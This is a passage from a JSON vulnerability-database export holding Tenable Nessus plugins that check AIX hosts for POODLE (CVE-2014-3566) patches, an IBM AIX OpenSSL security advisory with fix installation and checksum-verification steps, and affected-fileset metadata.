{"vector": "NONE", "value": 5.0}}, "naslFamily": "AIX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-07-17T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV73973.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84272", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84272);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/07/17 12:00:06\");\n\n script_cve_id(\"CVE-2014-3566\");\n script_bugtraq_id(70574);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"AIX 6.1 TL 8 : nettcp (IV73973) (POODLE)\");\n script_summary(english:\"Check for APAR IV73973 or APAR IV75644.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AIX host is missing a security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"A man-in-the-middle (MitM) information disclosure vulnerability,\nknown as POODLE, exists due to the way SSL 3.0 handles padding bytes\nwhen decrypting messages encrypted using block ciphers in cipher block\nchaining (CBC) mode. A MitM attacker can decrypt a selected byte of a\ncipher text in as few as 256 tries if they are able to force a victim\napplication to repeatedly send the same data over newly created SSL\n3.0 connections.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\"Install the appropriate interim fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\", \"Host/AIX/oslevelsp\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\noslevel = chomp(get_kb_item(\"Host/AIX/oslevelsp\"));\nif (isnull(oslevel)) audit(AUDIT_UNKNOWN_APP_VER, \"AIX\");\noslevelparts = split(oslevel, sep:'-', keep:0);\nif ( max_index(oslevelparts) != 4 ) audit(AUDIT_UNKNOWN_APP_VER, \"AIX\");\nif ( oslevelparts[0] != \"6100\" || oslevelparts[1] != \"08\" || oslevelparts[2] != \"06\" ) audit(AUDIT_OS_NOT, \"AIX 6100-08-06\", \"AIX \" + oslevel);\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"06\", patch:\"(IV73973s6a|IV75644m6a)\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.8.19\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"06\", patch:\"(IV73973s6a|IV75644m6a)\", package:\"bos.net.tcp.server\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.8.18\") < 0) flag++;\n\nif (flag)\n{\n aix_report_extra = ereg_replace(string:aix_report_get(), pattern:\"[()]\", replace:\"\");\n aix_report_extra = ereg_replace(string:aix_report_extra, pattern:\"[|]\", replace:\" or \");\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_extra);\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bos.net.tcp.client / bos.net.tcp.server\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-07-21T08:17:49", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html"], "pluginID": "84271", "description": "A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.", "edition": 8, "reporter": "Tenable", "published": "2015-06-19T00:00:00", "title": "AIX 7.1 TL 3 : nettcp (IV73419) (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "AIX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-07-17T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV73419.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84271", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84271);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/07/17 12:00:06\");\n\n script_cve_id(\"CVE-2014-3566\");\n script_bugtraq_id(70574);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"AIX 7.1 TL 3 : nettcp (IV73419) (POODLE)\");\n script_summary(english:\"Check for APAR IV73419 or APAR IV75646.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AIX host is missing a security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"A man-in-the-middle (MitM) information disclosure vulnerability,\nknown as POODLE, exists due to the way SSL 3.0 handles padding bytes\nwhen decrypting messages encrypted using block ciphers in cipher block\nchaining (CBC) mode. A MitM attacker can decrypt a selected byte of a\ncipher text in as few as 256 tries if they are able to force a victim\napplication to repeatedly send the same data over newly created SSL\n3.0 connections.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\"Install the appropriate interim fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\", \"Host/AIX/oslevelsp\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\noslevel = chomp(get_kb_item(\"Host/AIX/oslevelsp\"));\nif (isnull(oslevel)) audit(AUDIT_UNKNOWN_APP_VER, \"AIX\");\noslevelparts = split(oslevel, sep:'-', keep:0);\nif ( max_index(oslevelparts) != 4 ) audit(AUDIT_UNKNOWN_APP_VER, \"AIX\");\nif ( oslevelparts[0] != \"7100\" || oslevelparts[1] != \"03\" || oslevelparts[2] != \"05\" ) audit(AUDIT_OS_NOT, \"AIX 7100-03-05\", \"AIX \" + oslevel);\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"05\", patch:\"(IV73419s5a|IV75646m5a)\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.0.0\", maxfilesetver:\"7.1.3.48\") < 0) flag++;\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"05\", patch:\"(IV73419s5a|IV75646m5a)\", package:\"bos.net.tcp.server\", minfilesetver:\"7.1.0.0\", maxfilesetver:\"7.1.3.45\") < 0) flag++;\n\nif (flag)\n{\n aix_report_extra = ereg_replace(string:aix_report_get(), pattern:\"[()]\", replace:\"\");\n aix_report_extra = ereg_replace(string:aix_report_extra, pattern:\"[|]\", replace:\" or \");\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_extra);\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bos.net.tcp.client / bos.net.tcp.server\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "aix": [{"lastseen": "2016-10-24T17:48:11", "aixFileset": [{"productVersions": ["any"], "versionGte": "12.9.8.1100", "fileset": "openssl.base", "versionLte": "12.9.8.2503", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "1.0.1.500", "fileset": "openssl.base", "versionLte": "1.0.1.512", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "0.9.8.401", "fileset": "openssl.base", "versionLte": "0.9.8.2503", "productName": "aix"}], "references": [], "edition": 1, "description": "IBM SECURITY ADVISORY\n\nFirst Issued: <Wed Oct 29 04:58:52 CDT 2014>\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\n1.VULNERABILITY: AIX OpenSSL Denial of Service due to memory leak in DTLS SRTP extension\n\n PLATFORMS: AIX 5.3, 6.1 and 7.1\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below.\n\n THREAT: See below\n\n CVE Numbers: CVE-2014-3513\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n2. VULNERABILITY: AIX OpenSSL Patch to mitigate CVE-2014-3566\n\n PLATFORMS: AIX 5.3, 6.1 and 7.1\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below.\n\n THREAT: See below\n\n CVE Numbers: CVE-2014-3566\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n3. VULNERABILITY: AIX OpenSSL Denial of Service due to memory consumption\n\n PLATFORMS: AIX 5.3, 6.1 and 7.1\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below.\n\n THREAT: See below\n\n CVE Numbers: CVE-2014-3567\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION \n \n 1. CVE-2014-3513\n\tOpenSSL could allow remote attackers to cause a denial of service \n\t(memory consumption) via crafted handshake message\n\n 2. CVE-2014-3566\n\tSSL protocol 3.0 uses nondeterministic CBC padding, which makes it easier\n\tfor man-in-the-middle attackers to obtain cleartext data via a \n\tpadding-oracle attack.\n\n 3. CVE-2014-3567\n\tOpenSSL could allow remote attackers to cause a denial of service \n\t(memory consumption) via crafted session ticket that triggers an \n\tintegrity-check failure.\n\nII. CVSS\n\n 1. CVE-2014-3513\n CVSS Base Score: 5\n CVSS Temporal Score: http://xforce.iss.net/xforce/xfdb/97035\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n 2. CVE-2014-3566\n CVSS Base Score: 4.3\n CVSS Temporal Score: http://xforce.iss.net/xforce/xfdb/97013\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n 3. CVE-2014-3567\n CVSS Base Score: 5\n CVSS Temporal Score: http://xforce.iss.net/xforce/xfdb/97036\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L openssl.base\n \n The following fileset levels are vulnerable:\n \n A. CVE-2014-3513\n\n AIX Fileset Lower Level Upper Level \n ------------------------------------------\n openssl.base 1.0.1.500 1.0.1.512\n\n B. CVE-2014-3566, CVE-2014-3567\n\n AIX Fileset Lower Level Upper Level \n ------------------------------------------\n openssl.base 1.0.1.500 1.0.1.512\n openssl.base 0.9.8.401 0.9.8.2503\n openssl.base 12.9.8.1100 12.9.8.2503\n\n\tNote, 0.9.8.401 and 12.9.8.1100 are the Lowest OpenSSL version\n\tavailable in aix web download site. Even OpenSSL versions below \n\tthis are impacted\n\n\nIV. SOLUTIONS\n\n A. FIXES\n\n Fix is available. The fix can be downloaded via ftp\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_fix11.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n releases.\n\n\tNote that the tar file contains Interim fixes that are based on OpenSSL version.\n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation)\n ---------------------------------------------------------------------------------\n 5.3, 6.1, 7.1 IV66250s9a.141027.epkg.Z\t openssl.base(1.0.1.512 version)\n 5.3, 6.1, 7.1 IV66250s9b.141027.epkg.Z openssl.base(0.9.8.2503 version)\n 5.3, 6.1, 7.1 IV66250s9c.141027.epkg.Z\t openssl.base(12.9.8.2503 version)\n\n VIOS Level Interim Fix (*.Z)\t Fileset Name(prereq for installation)\n -------------------------------------------------------------------------------------\n 2.2.* IV66250s9a.141027.epkg.Z\t openssl.base(1.0.1.512 version)\n 2.2.* IV66250s9b.141027.epkg.Z\t openssl.base(0.9.8.2503 version)\n 2.2.* IV66250s9c.141027.epkg.Z\t openssl.base(12.9.8.2503 version)\n\n\n To extract the fix from the tar file:\n\n tar xvf openssl_fix11.tar\n cd openssl_fix11\n\n Verify you have retrieved the fix intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 \t\t\t\t\t\t filename\t \n ----------------------------------------------------------------------------------------------\n \t5bde653c4cb972b7068aa99a49c4a388abf2cdc0627fd61d2a7278b7a5d1e1cb \tIV66250s9a.141027.epkg.Z\n\tb8a8c74835add78314e48540640f50478ec11b08195fe2df979f7d1597722a60\tIV66250s9b.141027.epkg.Z\n\t8b3b019c6ed2bf0d54ed93f2e5159ace136c7ad7a8d3b1735748c0f13a4bc1cf\tIV66250s9c.141027.epkg.Z\n\n\tThese sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc.sig \n\n\topenssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n These fixes will also be part of the next filesets of OpenSSL versions 0.9.8.2504, 12.9.8.2504 and 1.0.1.513.\n\tThe estimated availability date of filesets is by 1st December 2014 and can be downloaded from - \n\thttps://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssl&cp=UTF-8\n\n \n B. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\nV. WORKAROUNDS\n \n No workarounds.\n\nVI. CONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\n\nVII. REFERENCES:\n\n Note: Keywords labeled as KEY in this document are used for parsing purposes.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/97035\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/97013\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/97036\n CVE-2014-3513 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n CVE-2014-3566 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n CVE-2014-3567 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "reporter": "CentOS Project", "published": "2014-10-29T04:58:52", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "aix", "title": "AIX OpenSSL Denial of Service due to memory leak in DTLS / AIX OpenSSL Patch to mitigate CVE-2014-3566 / AIX OpenSSL Denial of Service due to memory consumption", "aix": {"apars": []}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2014-10-29T04:58:52", "href": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc", "id": "OPENSSL_ADVISORY11.ASC", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-05-07T21:25:16", "aixFileset": [{"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "vios"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.3.45", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.server", "versionLte": "7.1.2.18", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], 